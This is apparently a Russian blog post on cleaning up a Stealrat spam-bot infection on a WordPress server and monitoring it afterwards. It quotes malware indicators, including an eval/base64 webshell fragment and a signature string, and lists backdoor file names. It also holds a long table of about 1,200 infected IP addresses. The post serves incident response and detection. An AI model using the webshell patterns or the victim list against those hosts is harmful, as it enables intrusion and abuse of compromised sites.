Не слышали еще о спам-боте Stealrat? Возможно во время чтения данного поста ваш любимый сайт рассылает тысячи спам собщений через ваш же почтовый сервер. По поводу спам-бота Stealrat на Хабре не было еще упоминаний, что очень странно.Один из наших серверов был заражен. На сервере в основном размещались сайты на Wordpress. Проблему локализировали, все вычистили и прикрыли. Все бы хорошо, но есть одно но…
Спам-бот Stealrat построен по принципу ботнета. Размещается на таких популярных CMS как WordPress, Joomla!, Drupal и других не защищенных, уязвимых сайтах.
Если вкратце то это капец товарищи, такие масштабы спам-бота. Тысячи зараженных сайтов, об этом далее.
Технические характеристики
Вредоносный скрипт написан на PHP. Код сжат и пропущен через обфускатор кода. Присутствует функция eval. Все данные принимает массивом POST методом в base64 кодировке. Присутствует так же некоторая строковая закономерность в виде строки "die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321));". Бот формирует email сообщения с рандомным именем отправителя на основании домена сайта и пытается отправить письмо через PHP функцию mail. Если такая функция недоступна, бот пытается подключиться через сокет к почтовому серверу и сделать отправку через него, в обход функции mail. В основном бот делает рассылку спам сообщений с ссылками на порно-сайты через проксирование html страничек взломанных сайтов. Помимо самого управляющего скрипта, так же было обнаружено множество бекдоров и webshell-лов в разных папках CMS Wordpress. Скрипты именованы случайным образом, например: styles.php, del.php, up.php, index.php (в тех папках где нет главного индексного файла, или же он был но пустой), bak.php, image.php, test.php, code.php, dir.php diff.php и т. д.
Обнаружение, признаки, первые меры
Первым что бросилось в глаза, так это задержки между отправкой и приемом почтовых писем. В очереди почтового сервера стояли сотни тысяч писем на отправку. Спасибо Munin за его графики, посмотрели и ужаснулись. Удалили все письма из очереди. Через apache server status обнаружили странные POST запросы на php скрипт одного из виртуальных хостов. Как вы уже догадались, на нем стоял Wordpress. Прикрыли вредоносный скрипт путем переименования файла, сделали бекап зараженного виртуального хоста. Восстановили файлы сайта из бекапа и закрыли посредством htaccess файла доступ ко всем папкам, оставили доступ только для нашего IP. В общем наладили нормальную работу сайта, остальное закрыли все, вплоть до панели управления и всех дополнительных папок с классами и дополнительными библиотеками.
Анализ кода, поиск деталей по вредоносному скрипту
Далее начали анализировать сам вредоносный скрипт, который принимал команды и отправлял сообщения. Выстроили код, разложили все по полочкам. После обфускации код не читабельный а имена переменных и функций названы рандомно. Смотрим код по смыслу выполнения и обычной заменой текста в текстовом редакторе приводим все в нормальный и читабельный вид. Все стало понятно сразу же после форматирования кода, а после приведения имен переменных и функций уточнились детали формирования тела письма, имя отправителя и почтовых заголовков.
Далее начался квест с поисковой системой Google и оригинальным кодом спам-бота. Пытались найти константы, похожие и повторяющиеся участки кода. Поиск не давал значимых результатов, а если и находило что то то примерно такого содержания:
Пользователь 1: Что это у меня такое на сайте if(isset($_POST['n8743bb'])) { base64_decode($_POST['n8743bb']) }?
Пользователь 2: Твой сайт взломали, ищи webshell…
Конец
Чудным образом удалось найти документ компании trendmicro, еще и в PDF формате, (Ссылка) в котором было все подробно и детально описано. Посмотрели — такие же признаки, все точно такое же. Ну хоть название вредоносного скрипта нашли: Stealrat. Опять гугление по слову Stealrat и опять ничего толкового.
Что сделали дальше?
Выявление дыры, через которую залили вредоносный скрипт оставили на «потом». Вместо этого, мы модифицировали разобранный скрипт таким образом, что бы он делал расшифровку данных, логирование с IP адресом в базу данных и работал как должен якобы работать как не вчем не бывало. Логирование работает уже неделю и по текущий день. Написали веб интерфейс для всего этого, прикрутили GeoIP и шок…
На текущий момент в логах около 580638 POST обращений, 1223 уникальных IP адресов, зараженных сайтов (хостингов, виртуальных хостов) с 59 стран. Больше всего из России.
Немного статистики
Полный список зараженных уникальных IP (1223)
| IP | Hits | Country Code | Country Name | City |
| 77.222.61.177 | 7428 | RU | Russian Federation | |
| 37.187.134.225 | 5592 | FR | France | |
| 93.95.102.215 | 5532 | RU | Russian Federation | |
| 77.222.40.32 | 5364 | RU | Russian Federation | |
| 81.169.175.71 | 4812 | DE | Germany | Berlin |
| 77.222.56.216 | 4812 | RU | Russian Federation | |
| 82.98.131.108 | 4320 | ES | Spain | |
| 77.222.42.206 | 4308 | RU | Russian Federation | |
| 81.25.112.130 | 4044 | ES | Spain | |
| 192.196.156.128 | 3972 | US | United States | West Chester |
| 37.187.140.59 | 3948 | FR | France | |
| 77.222.56.50 | 3804 | RU | Russian Federation | |
| 77.222.61.126 | 3684 | RU | Russian Federation | |
| 77.222.42.105 | 3552 | RU | Russian Federation | |
| 78.46.142.128 | 3504 | DE | Germany | |
| 31.31.196.14 | 3216 | RU | Russian Federation | |
| 77.222.56.218 | 3168 | RU | Russian Federation | |
| 37.1.194.126 | 3024 | DE | Germany | |
| 54.207.1.94 | 3000 | US | United States | Seattle |
| 81.22.215.82 | 2916 | RU | Russian Federation | |
| 175.143.102.33 | 2892 | MY | Malaysia | Ampang |
| 46.8.37.103 | 2808 | GR | Greece | Patras |
| 199.116.77.18 | 2724 | US | United States | Traverse City |
| 77.222.42.202 | 2688 | RU | Russian Federation | |
| 77.222.61.224 | 2676 | RU | Russian Federation | |
| 91.144.0.92 | 2664 | SY | Syrian Arab Republic | |
| 77.222.61.141 | 2664 | RU | Russian Federation | |
| 69.93.112.130 | 2628 | US | United States | Houston |
| 95.31.251.22 | 2628 | RU | Russian Federation | |
| 77.222.61.135 | 2580 | RU | Russian Federation | |
| 77.222.61.14 | 2520 | RU | Russian Federation | |
| 144.76.3.116 | 2472 | DE | Germany | |
| 178.63.27.83 | 2448 | DE | Germany | |
| 5.79.68.147 | 2424 | NL | Netherlands | Amsterdam |
| 77.222.40.122 | 2376 | RU | Russian Federation | |
| 77.222.56.201 | 2340 | RU | Russian Federation | |
| 199.127.219.121 | 2340 | US | United States | Orlando |
| 77.222.40.40 | 2304 | RU | Russian Federation | |
| 75.150.62.121 | 2160 | US | United States | Ashburn |
| 95.79.25.124 | 2136 | RU | Russian Federation | Nizhniy Novgorod |
| 64.131.66.119 | 2112 | US | United States | Reston |
| 188.168.81.13 | 2076 | RU | Russian Federation | Chita |
| 77.222.40.75 | 2076 | RU | Russian Federation | |
| 77.222.61.10 | 2052 | RU | Russian Federation | |
| 77.222.61.154 | 2028 | RU | Russian Federation | |
| 46.105.37.61 | 2004 | FR | France | |
| 77.244.145.236 | 1968 | TJ | Tajikistan | |
| 90.189.192.100 | 1968 | RU | Russian Federation | Novosibirsk |
| 46.16.188.2 | 1956 | GB | United Kingdom | |
| 109.74.144.122 | 1944 | SK | Slovakia | |
| 108.166.181.163 | 1944 | US | United States | Dallas |
| 77.222.40.165 | 1932 | RU | Russian Federation | |
| 77.222.42.228 | 1896 | RU | Russian Federation | |
| 77.222.56.207 | 1884 | RU | Russian Federation | |
| 77.222.61.138 | 1848 | RU | Russian Federation | |
| 77.222.56.205 | 1848 | RU | Russian Federation | |
| 89.223.104.156 | 1836 | RU | Russian Federation | |
| 89.184.74.156 | 1836 | UA | Ukraine | Kiev |
| 91.228.236.11 | 1800 | UA | Ukraine | |
| 37.140.193.35 | 1788 | RU | Russian Federation | |
| 69.42.49.134 | 1764 | CA | Canada | Toronto |
| 77.222.40.93 | 1764 | RU | Russian Federation | |
| 109.123.155.11 | 1752 | RU | Russian Federation | Tomsk |
| 212.55.180.197 | 1716 | PT | Portugal | |
| 54.232.216.189 | 1716 | BR | Brazil | S�o Paulo |
| 37.140.192.48 | 1716 | RU | Russian Federation | |
| 199.187.124.244 | 1680 | US | United States | Philadelphia |
| 77.222.40.208 | 1680 | RU | Russian Federation | |
| 37.140.192.223 | 1656 | RU | Russian Federation | |
| 174.143.204.52 | 1644 | US | United States | San Antonio |
| 77.222.42.238 | 1644 | RU | Russian Federation | |
| 198.154.236.22 | 1620 | US | United States | Houston |
| 24.56.180.66 | 1620 | US | United States | Woodland Park |
| 77.222.40.131 | 1608 | RU | Russian Federation | |
| 77.232.66.20 | 1584 | EU | Europe | |
| 144.76.107.253 | 1584 | DE | Germany | |
| 193.106.92.206 | 1572 | RU | Russian Federation | Moscow |
| 89.31.96.196 | 1560 | NL | Netherlands | |
| 217.70.145.26 | 1548 | IT | Italy | |
| 77.222.56.213 | 1536 | RU | Russian Federation | |
| 77.222.61.243 | 1536 | RU | Russian Federation | |
| 77.222.40.145 | 1524 | RU | Russian Federation | |
| 216.14.115.203 | 1524 | US | United States | Buffalo Grove |
| 77.222.40.39 | 1512 | RU | Russian Federation | |
| 37.140.192.34 | 1512 | RU | Russian Federation | |
| 46.19.232.104 | 1488 | IT | Italy | Pordenone |
| 185.13.44.3 | 1476 | RU | Russian Federation | |
| 204.145.100.34 | 1464 | US | United States | Corpus Christi |
| 185.12.124.103 | 1464 | RU | Russian Federation | |
| 77.222.40.137 | 1452 | RU | Russian Federation | |
| 208.109.236.165 | 1452 | US | United States | Scottsdale |
| 199.116.77.13 | 1452 | US | United States | Traverse City |
| 211.181.136.111 | 1440 | KR | Korea, Republic of | |
| 195.70.36.86 | 1440 | HU | Hungary | |
| 77.222.40.105 | 1428 | RU | Russian Federation | |
| 5.187.4.5 | 1416 | DE | Germany | Frankfurt |
| 217.115.185.44 | 1368 | RU | Russian Federation | Komsomolskaya |
| 77.222.40.62 | 1368 | RU | Russian Federation | |
| 212.113.145.188 | 1368 | GB | United Kingdom | |
| 205.134.241.45 | 1344 | US | United States | Los Angeles |
| 204.197.252.48 | 1332 | US | United States | Los Angeles |
| 81.89.48.114 | 1332 | SK | Slovakia | |
| 77.222.56.203 | 1320 | RU | Russian Federation | |
| 46.36.219.220 | 1284 | EE | Estonia | |
| 77.222.40.59 | 1272 | RU | Russian Federation | |
| 77.222.40.72 | 1272 | RU | Russian Federation | |
| 77.222.56.94 | 1260 | RU | Russian Federation | |
| 42.112.16.118 | 1260 | VN | Vietnam | Hanoi |
| 194.190.184.71 | 1248 | RU | Russian Federation | Nizhniy Novgorod |
| 37.59.131.240 | 1236 | FR | France | |
| 199.116.77.28 | 1224 | US | United States | Traverse City |
| 37.140.192.235 | 1224 | RU | Russian Federation | |
| 69.72.130.98 | 1212 | US | United States | Clifton |
| 173.236.184.107 | 1212 | US | United States | Brea |
| 188.190.123.59 | 1212 | UA | Ukraine | Kharkov |
| 77.222.40.109 | 1200 | RU | Russian Federation | |
| 91.221.61.83 | 1200 | RU | Russian Federation | |
| 77.222.56.6 | 1188 | RU | Russian Federation | |
| 193.37.152.179 | 1188 | DE | Germany | |
| 200.82.144.234 | 1176 | VE | Venezuela | Caracas |
| 106.187.53.107 | 1176 | JP | Japan | |
| 212.92.23.81 | 1176 | HU | Hungary | |
| 222.122.81.19 | 1176 | KR | Korea, Republic of | |
| 50.31.99.1 | 1175 | US | United States | Chicago |
| 77.222.61.170 | 1164 | RU | Russian Federation | |
| 77.222.56.204 | 1140 | RU | Russian Federation | |
| 37.140.192.104 | 1128 | RU | Russian Federation | |
| 80.248.213.214 | 1128 | FR | France | Gif-sur-yvette |
| 84.201.36.232 | 1128 | DE | Germany | |
| 199.116.78.163 | 1128 | US | United States | Traverse City |
| 46.18.32.78 | 1128 | BE | Belgium | |
| 77.222.61.99 | 1128 | RU | Russian Federation | |
| 5.9.32.199 | 1128 | DE | Germany | |
| 67.139.73.190 | 1128 | US | United States | Vancouver |
| 38.92.224.164 | 1104 | US | United States | Miami |
| 195.189.111.60 | 1104 | RU | Russian Federation | |
| 91.191.172.198 | 1104 | TR | Turkey | Izmir |
| 164.177.154.130 | 1092 | GB | United Kingdom | |
| 106.187.46.64 | 1080 | JP | Japan | |
| 77.222.61.150 | 1080 | RU | Russian Federation | |
| 78.46.32.115 | 1068 | DE | Germany | N�rnberg |
| 213.248.30.74 | 1068 | RU | Russian Federation | |
| 195.154.222.121 | 1068 | FR | France | |
| 78.47.58.134 | 1056 | DE | Germany | |
| 75.126.229.50 | 1044 | US | United States | Dallas |
| 82.165.138.50 | 1044 | DE | Germany | |
| 77.222.56.223 | 1044 | RU | Russian Federation | |
| 216.70.112.74 | 1032 | US | United States | Culver City |
| 77.71.24.3 | 1032 | BG | Bulgaria | Varna |
| 89.207.74.38 | 1032 | RU | Russian Federation | |
| 192.163.202.154 | 1020 | US | United States | Provo |
| 77.222.61.17 | 1020 | RU | Russian Federation | |
| 77.222.40.160 | 1020 | RU | Russian Federation | |
| 82.145.37.137 | 1020 | GB | United Kingdom | |
| 94.46.8.45 | 1008 | PT | Portugal | Lisbon |
| 173.205.127.243 | 1008 | US | United States | |
| 134.213.1.108 | 1008 | GB | United Kingdom | |
| 213.249.64.34 | 996 | NL | Netherlands | Amsterdam |
| 31.210.62.36 | 996 | TR | Turkey | Sanayi |
| 77.222.40.88 | 996 | RU | Russian Federation | |
| 78.4.254.161 | 996 | IT | Italy | |
| 50.23.16.2 | 996 | US | United States | Dallas |
| 77.222.40.48 | 996 | RU | Russian Federation | |
| 37.140.192.47 | 996 | RU | Russian Federation | |
| 77.222.42.160 | 984 | RU | Russian Federation | |
| 74.50.27.62 | 984 | US | United States | Anaheim |
| 72.52.252.21 | 984 | US | United States | Lansing |
| 82.99.171.171 | 972 | CZ | Czech Republic | |
| 69.163.222.201 | 972 | US | United States | Brea |
| 216.234.108.151 | 972 | US | United States | Southfield |
| 216.246.23.203 | 972 | US | United States | Chicago |
| 77.222.42.226 | 960 | RU | Russian Federation | |
| 77.222.40.25 | 960 | RU | Russian Federation | |
| 46.105.56.164 | 960 | FR | France | |
| 188.168.46.53 | 960 | RU | Russian Federation | |
| 37.140.192.97 | 960 | RU | Russian Federation | |
| 217.174.97.19 | 960 | RU | Russian Federation | Moscow |
| 5.9.40.52 | 948 | DE | Germany | |
| 134.0.113.40 | 948 | RU | Russian Federation | |
| 91.202.171.103 | 948 | IL | Israel | |
| 77.222.56.18 | 936 | RU | Russian Federation | |
| 83.69.176.252 | 936 | RU | Russian Federation | |
| 71.6.221.100 | 936 | US | United States | San Diego |
| 193.178.146.181 | 936 | UA | Ukraine | |
| 85.10.195.211 | 924 | DE | Germany | N�rnberg |
| 109.196.210.110 | 924 | RU | Russian Federation | Zheleznogorsk |
| 5.187.1.149 | 924 | DE | Germany | Frankfurt |
| 91.228.199.180 | 924 | PL | Poland | |
| 199.204.248.103 | 924 | US | United States | Columbus |
| 132.247.1.49 | 912 | MX | Mexico | Mexico |
| 77.222.40.206 | 912 | RU | Russian Federation | |
| 87.230.40.60 | 912 | DE | Germany | H�st |
| 213.239.201.157 | 912 | DE | Germany | N�rnberg |
| 91.201.52.78 | 912 | RU | Russian Federation | |
| 94.229.68.98 | 900 | GB | United Kingdom | |
| 196.212.74.122 | 900 | ZA | South Africa | Hermanus |
| 212.143.6.114 | 900 | IL | Israel | |
| 216.97.233.44 | 888 | US | United States | Anaheim |
| 217.172.179.17 | 888 | DE | Germany | |
| 212.180.241.99 | 876 | PL | Poland | |
| 77.222.56.166 | 864 | RU | Russian Federation | |
| 64.92.209.154 | 864 | US | United States | Englewood |
| 159.253.39.225 | 864 | TR | Turkey | |
| 166.78.188.144 | 864 | US | United States | San Antonio |
| 63.143.53.66 | 852 | US | United States | Dallas |
| 65.99.237.35 | 852 | US | United States | Saint Louis |
| 85.214.103.141 | 840 | DE | Germany | Berlin |
| 77.222.40.114 | 840 | RU | Russian Federation | |
| 176.9.46.72 | 840 | DE | Germany | |
| 208.43.56.34 | 840 | US | United States | Dallas |
| 176.9.84.22 | 840 | DE | Germany | |
| 77.222.40.172 | 828 | RU | Russian Federation | |
| 190.0.140.27 | 828 | UY | Uruguay | Montevideo |
| 88.191.123.124 | 828 | FR | France | Paris |
| 195.93.180.34 | 828 | RU | Russian Federation | |
| 92.46.62.199 | 816 | KZ | Kazakhstan | |
| 129.121.177.200 | 816 | US | United States | Albuquerque |
| 77.222.61.12 | 816 | RU | Russian Federation | |
| 50.57.190.250 | 816 | US | United States | San Antonio |
| 37.140.192.39 | 816 | RU | Russian Federation | |
| 216.246.41.118 | 804 | US | United States | Chicago |
| 95.169.184.30 | 804 | DE | Germany | |
| 213.162.246.72 | 804 | NO | Norway | |
| 87.106.208.181 | 804 | DE | Germany | |
| 199.167.47.227 | 792 | US | United States | Mclean |
| 168.144.134.181 | 792 | CA | Canada | Toronto |
| 5.9.19.73 | 792 | DE | Germany | |
| 85.214.216.117 | 792 | DE | Germany | Berlin |
| 85.13.135.146 | 792 | DE | Germany | |
| 91.201.53.12 | 780 | RU | Russian Federation | |
| 77.79.246.80 | 780 | PL | Poland | Jastrzebie Zdroj |
| 77.222.61.19 | 780 | RU | Russian Federation | |
| 77.222.40.158 | 780 | RU | Russian Federation | |
| 64.34.157.100 | 780 | US | United States | New York |
| 209.239.112.108 | 780 | US | United States | Saint Louis |
| 76.74.242.190 | 780 | US | United States | New York |
| 166.63.126.169 | 780 | US | United States | Columbus |
| 31.31.196.41 | 768 | RU | Russian Federation | |
| 77.221.130.48 | 768 | RU | Russian Federation | |
| 162.144.85.59 | 768 | US | United States | Provo |
| 77.222.40.64 | 768 | RU | Russian Federation | |
| 50.23.81.114 | 768 | US | United States | San Jose |
| 173.199.142.151 | 768 | US | United States | Chicago |
| 194.146.134.2 | 768 | UA | Ukraine | Lugansk |
| 148.251.75.178 | 756 | DE | Germany | |
| 109.247.129.59 | 756 | NO | Norway | |
| 77.222.61.85 | 756 | RU | Russian Federation | |
| 173.199.142.14 | 756 | US | United States | Chicago |
| 77.222.40.22 | 756 | RU | Russian Federation | |
| 202.78.227.53 | 756 | VN | Vietnam | |
| 173.236.152.136 | 756 | US | United States | Brea |
| 5.9.229.51 | 756 | DE | Germany | |
| 64.131.73.92 | 744 | US | United States | Reston |
| 202.75.53.90 | 744 | MY | Malaysia | |
| 38.112.60.242 | 744 | US | United States | |
| 188.120.255.78 | 744 | RU | Russian Federation | Moscow |
| 88.191.232.238 | 744 | FR | France | Paris |
| 67.228.16.138 | 744 | US | United States | Dallas |
| 95.110.202.235 | 732 | IT | Italy | |
| 209.51.155.226 | 732 | US | United States | Atlanta |
| 85.25.118.107 | 732 | DE | Germany | |
| 85.13.131.32 | 732 | DE | Germany | |
| 46.37.21.116 | 732 | IT | Italy | |
| 37.140.193.24 | 732 | RU | Russian Federation | |
| 37.143.11.70 | 732 | RU | Russian Federation | |
| 5.149.139.8 | 732 | BE | Belgium | |
| 198.46.82.33 | 732 | US | United States | Los Angeles |
| 144.76.114.78 | 720 | DE | Germany | |
| 89.31.103.165 | 720 | NL | Netherlands | |
| 185.4.75.115 | 720 | EE | Estonia | |
| 92.48.115.19 | 720 | GB | United Kingdom | |
| 216.177.136.215 | 720 | US | United States | Laguna Niguel |
| 180.210.206.201 | 720 | SG | Singapore | |
| 77.222.61.77 | 708 | RU | Russian Federation | |
| 205.186.143.5 | 708 | US | United States | Culver City |
| 91.201.52.81 | 708 | RU | Russian Federation | |
| 188.225.16.46 | 708 | RU | Russian Federation | |
| 77.222.40.199 | 708 | RU | Russian Federation | |
| 37.140.192.91 | 696 | RU | Russian Federation | |
| 85.25.134.63 | 696 | DE | Germany | |
| 77.37.150.72 | 696 | RU | Russian Federation | Moscow |
| 80.252.184.10 | 696 | SE | Sweden | |
| 94.181.117.21 | 696 | RU | Russian Federation | Izhevsk |
| 173.193.195.140 | 696 | US | United States | Dallas |
| 193.108.251.210 | 696 | UA | Ukraine | Cherkassy |
| 77.222.40.118 | 696 | RU | Russian Federation | |
| 37.187.17.109 | 684 | FR | France | |
| 164.138.216.83 | 684 | BG | Bulgaria | |
| 46.4.130.178 | 684 | DE | Germany | |
| 31.186.175.15 | 684 | NL | Netherlands | |
| 195.62.78.7 | 684 | RU | Russian Federation | |
| 77.222.40.55 | 684 | RU | Russian Federation | |
| 54.186.24.70 | 684 | US | United States | Boardman |
| 77.222.40.148 | 684 | RU | Russian Federation | |
| 77.222.42.236 | 684 | RU | Russian Federation | |
| 89.96.141.25 | 684 | IT | Italy | |
| 66.85.130.226 | 672 | US | United States | Tempe |
| 77.222.40.200 | 672 | RU | Russian Federation | |
| 88.198.193.147 | 672 | DE | Germany | |
| 194.141.47.8 | 672 | BG | Bulgaria | |
| 216.137.165.54 | 672 | CA | Canada | B�cancour |
| 188.95.51.249 | 672 | NL | Netherlands | |
| 77.222.56.7 | 672 | RU | Russian Federation | |
| 31.28.24.112 | 660 | RU | Russian Federation | |
| 67.225.159.38 | 660 | US | United States | Lansing |
| 144.76.16.182 | 660 | DE | Germany | |
| 69.163.241.179 | 648 | US | United States | Brea |
| 194.144.248.227 | 648 | IS | Iceland | Reykjav�k |
| 129.121.176.169 | 648 | US | United States | Albuquerque |
| 85.214.194.248 | 648 | DE | Germany | Berlin |
| 205.234.152.98 | 648 | US | United States | Buffalo |
| 162.243.5.242 | 648 | US | United States | |
| 5.63.147.252 | 648 | GB | United Kingdom | |
| 77.222.61.42 | 648 | RU | Russian Federation | |
| 198.145.183.3 | 648 | US | United States | Portland |
| 77.222.40.202 | 636 | RU | Russian Federation | |
| 67.18.8.2 | 636 | US | United States | Houston |
| 5.63.158.111 | 636 | RU | Russian Federation | |
| 207.7.92.188 | 636 | US | United States | Los Angeles |
| 109.74.5.154 | 636 | SE | Sweden | Stockholm |
| 209.105.246.250 | 636 | US | United States | Dallas |
| 77.222.61.75 | 636 | RU | Russian Federation | |
| 77.222.61.84 | 624 | RU | Russian Federation | |
| 192.254.156.170 | 624 | US | United States | Houston |
| 77.232.66.165 | 624 | EU | Europe | |
| 184.107.227.2 | 624 | CA | Canada | Montr�al |
| 67.227.161.141 | 624 | US | United States | Lansing |
| 108.165.21.198 | 624 | US | United States | Provo |
| 96.31.68.213 | 624 | US | United States | Tampa |
| 77.222.40.171 | 624 | RU | Russian Federation | |
| 2.81.148.63 | 624 | PT | Portugal | Aveiro |
| 64.120.236.234 | 624 | US | United States | Scranton |
| 78.40.124.42 | 612 | FR | France | |
| 95.141.46.140 | 612 | IT | Italy | Marco |
| 192.190.86.126 | 612 | US | United States | West Chester |
| 91.227.68.26 | 612 | RU | Russian Federation | |
| 85.13.139.11 | 612 | DE | Germany | |
| 188.225.24.62 | 600 | RU | Russian Federation | |
| 62.112.193.206 | 600 | HU | Hungary | |
| 89.184.76.158 | 600 | UA | Ukraine | Kiev |
| 198.154.241.84 | 600 | US | United States | Houston |
| 205.186.129.174 | 600 | US | United States | Culver City |
| 213.146.180.240 | 600 | GB | United Kingdom | |
| 77.221.130.25 | 600 | RU | Russian Federation | |
| 193.164.192.89 | 600 | NL | Netherlands | |
| 108.171.172.108 | 600 | US | United States | San Antonio |
| 185.22.234.47 | 600 | RU | Russian Federation | |
| 176.9.219.69 | 600 | DE | Germany | |
| 49.247.220.105 | 600 | KR | Korea, Republic of | |
| 172.245.32.55 | 600 | US | United States | Buffalo |
| 89.184.69.128 | 600 | UA | Ukraine | Kiev |
| 70.32.92.148 | 600 | US | United States | Culver City |
| 85.13.140.111 | 600 | DE | Germany | |
| 77.222.42.99 | 600 | RU | Russian Federation | |
| 77.222.61.189 | 600 | RU | Russian Federation | |
| 182.160.155.25 | 588 | AU | Australia | Surry Hills |
| 77.222.40.73 | 588 | RU | Russian Federation | |
| 85.214.233.193 | 588 | DE | Germany | Berlin |
| 31.193.138.86 | 588 | GB | United Kingdom | |
| 210.79.48.7 | 588 | NZ | New Zealand | |
| 78.47.152.75 | 588 | DE | Germany | |
| 91.106.201.58 | 588 | RU | Russian Federation | |
| 88.198.2.199 | 588 | DE | Germany | N�rnberg |
| 81.169.176.225 | 588 | DE | Germany | Berlin |
| 164.138.209.44 | 588 | ES | Spain | |
| 69.10.33.130 | 588 | US | United States | Secaucus |
| 168.144.159.47 | 588 | CA | Canada | Toronto |
| 50.97.104.146 | 588 | US | United States | Dallas |
| 109.86.206.43 | 588 | UA | Ukraine | |
| 176.9.85.162 | 588 | DE | Germany | |
| 78.46.49.169 | 588 | DE | Germany | N�rnberg |
| 85.13.137.250 | 576 | DE | Germany | |
| 217.160.168.14 | 576 | DE | Germany | |
| 82.220.34.47 | 576 | CH | Switzerland | |
| 188.126.73.71 | 576 | SE | Sweden | |
| 216.120.237.195 | 576 | US | United States | Clifton Park |
| 205.134.254.66 | 576 | US | United States | Los Angeles |
| 85.214.89.233 | 576 | DE | Germany | Berlin |
| 144.76.225.138 | 576 | DE | Germany | |
| 82.146.44.74 | 576 | RU | Russian Federation | Moscow |
| 144.76.173.120 | 576 | DE | Germany | |
| 93.191.155.169 | 576 | DK | Denmark | |
| 77.222.40.149 | 576 | RU | Russian Federation | |
| 95.142.65.116 | 576 | DE | Germany | Gilching |
| 46.4.147.233 | 564 | DE | Germany | |
| 87.117.215.158 | 564 | GB | United Kingdom | |
| 67.222.18.35 | 564 | US | United States | Los Angeles |
| 37.140.192.240 | 564 | RU | Russian Federation | |
| 174.142.115.7 | 564 | CA | Canada | Montr�al |
| 78.81.255.115 | 564 | RU | Russian Federation | Velikiy Novgorod |
| 85.214.29.65 | 564 | DE | Germany | Berlin |
| 95.110.229.90 | 564 | IT | Italy | |
| 85.13.146.60 | 564 | DE | Germany | |
| 80.91.80.52 | 564 | ES | Spain | |
| 64.64.27.226 | 564 | US | United States | Reston |
| 212.98.163.238 | 564 | BY | Belarus | Minsk |
| 46.165.219.73 | 564 | DE | Germany | |
| 88.208.217.191 | 564 | GB | United Kingdom | Gloucester |
| 91.222.11.212 | 564 | GB | United Kingdom | |
| 85.158.203.164 | 552 | NL | Netherlands | |
| 88.190.28.162 | 552 | FR | France | Paris |
| 213.115.25.231 | 552 | SE | Sweden | |
| 213.229.110.89 | 552 | GB | United Kingdom | |
| 93.183.203.76 | 552 | UA | Ukraine | |
| 67.225.220.136 | 552 | US | United States | Lansing |
| 50.62.41.168 | 552 | US | United States | Scottsdale |
| 77.222.61.108 | 552 | RU | Russian Federation | |
| 88.190.51.72 | 552 | FR | France | Paris |
| 80.70.2.4 | 552 | DK | Denmark | Copenhagen |
| 77.222.42.95 | 552 | RU | Russian Federation | |
| 176.53.25.197 | 540 | TR | Turkey | |
| 199.188.247.40 | 540 | US | United States | Houston |
| 108.83.139.140 | 540 | US | United States | |
| 129.121.177.74 | 540 | US | United States | Albuquerque |
| 63.247.137.102 | 540 | US | United States | Jacksonville |
| 62.75.236.228 | 540 | DE | Germany | |
| 72.55.164.206 | 540 | CA | Canada | Montr�al |
| 207.198.125.117 | 540 | US | United States | Atlanta |
| 77.222.40.33 | 540 | RU | Russian Federation | |
| 85.13.148.107 | 540 | DE | Germany | |
| 207.210.192.231 | 540 | US | United States | Dallas |
| 188.40.227.97 | 540 | DE | Germany | |
| 203.162.53.111 | 540 | VN | Vietnam | |
| 198.1.101.233 | 540 | US | United States | Provo |
| 185.23.16.138 | 540 | LT | Lithuania | |
| 78.140.185.138 | 540 | NL | Netherlands | |
| 62.212.103.171 | 540 | FR | France | |
| 216.139.217.60 | 540 | US | United States | Austin |
| 94.23.31.18 | 528 | FR | France | |
| 85.13.141.115 | 528 | DE | Germany | |
| 69.39.239.172 | 528 | US | United States | Arlington Heights |
| 208.113.162.92 | 528 | US | United States | Brea |
| 67.205.7.224 | 528 | US | United States | Brea |
| 64.119.182.134 | 528 | US | United States | Englewood |
| 91.184.30.7 | 528 | NL | Netherlands | |
| 109.74.2.144 | 528 | SE | Sweden | Falkenberg |
| 87.230.12.175 | 528 | DE | Germany | H�st |
| 75.98.175.80 | 528 | US | United States | Ann Arbor |
| 91.239.66.84 | 528 | PL | Poland | |
| 87.106.56.81 | 528 | DE | Germany | |
| 91.226.212.151 | 528 | UA | Ukraine | |
| 37.140.192.81 | 516 | RU | Russian Federation | |
| 50.97.106.106 | 516 | US | United States | Dallas |
| 77.222.40.245 | 516 | RU | Russian Federation | |
| 177.43.122.178 | 516 | BR | Brazil | Belo Horizonte |
| 69.93.97.98 | 516 | US | United States | Houston |
| 184.107.138.26 | 516 | CA | Canada | Montr�al |
| 195.200.253.149 | 516 | PT | Portugal | |
| 144.76.171.25 | 516 | DE | Germany | |
| 46.4.48.211 | 516 | DE | Germany | |
| 31.31.201.3 | 516 | RU | Russian Federation | |
| 216.27.5.9 | 516 | US | United States | Little Rock |
| 78.46.61.106 | 516 | DE | Germany | N�rnberg |
| 77.222.61.227 | 516 | RU | Russian Federation | |
| 31.210.62.37 | 516 | TR | Turkey | Sanayi |
| 85.214.43.163 | 516 | DE | Germany | Berlin |
| 88.190.231.87 | 504 | FR | France | Paris |
| 77.222.57.159 | 504 | RU | Russian Federation | |
| 217.79.179.163 | 504 | DE | Germany | |
| 150.146.204.33 | 504 | IT | Italy | Centrale |
| 54.252.157.46 | 504 | AU | Australia | Sydney |
| 162.248.48.75 | 504 | US | United States | |
| 5.79.65.102 | 504 | NL | Netherlands | Amsterdam |
| 192.145.239.3 | 504 | US | United States | Los Angeles |
| 130.185.83.152 | 504 | PT | Portugal | |
| 62.76.190.228 | 504 | RU | Russian Federation | |
| 94.214.169.231 | 504 | NL | Netherlands | |
| 37.140.197.111 | 504 | RU | Russian Federation | |
| 5.9.125.234 | 504 | DE | Germany | |
| 178.63.88.199 | 504 | DE | Germany | |
| 94.199.178.153 | 504 | HU | Hungary | |
| 134.0.112.21 | 504 | RU | Russian Federation | |
| 103.11.100.46 | 504 | HK | Hong Kong | |
| 37.140.192.78 | 492 | RU | Russian Federation | |
| 89.184.69.66 | 492 | UA | Ukraine | Kiev |
| 77.222.42.120 | 492 | RU | Russian Federation | |
| 173.254.28.144 | 492 | US | United States | Provo |
| 79.137.213.14 | 492 | RU | Russian Federation | |
| 91.201.52.34 | 492 | RU | Russian Federation | |
| 69.160.53.210 | 492 | US | United States | Southfield |
| 69.64.38.84 | 492 | US | United States | Saint Louis |
| 162.144.68.24 | 492 | US | United States | Provo |
| 116.213.5.192 | 492 | AU | Australia | |
| 46.4.99.85 | 480 | DE | Germany | |
| 93.89.54.155 | 480 | IT | Italy | |
| 83.169.30.138 | 480 | DE | Germany | H�st |
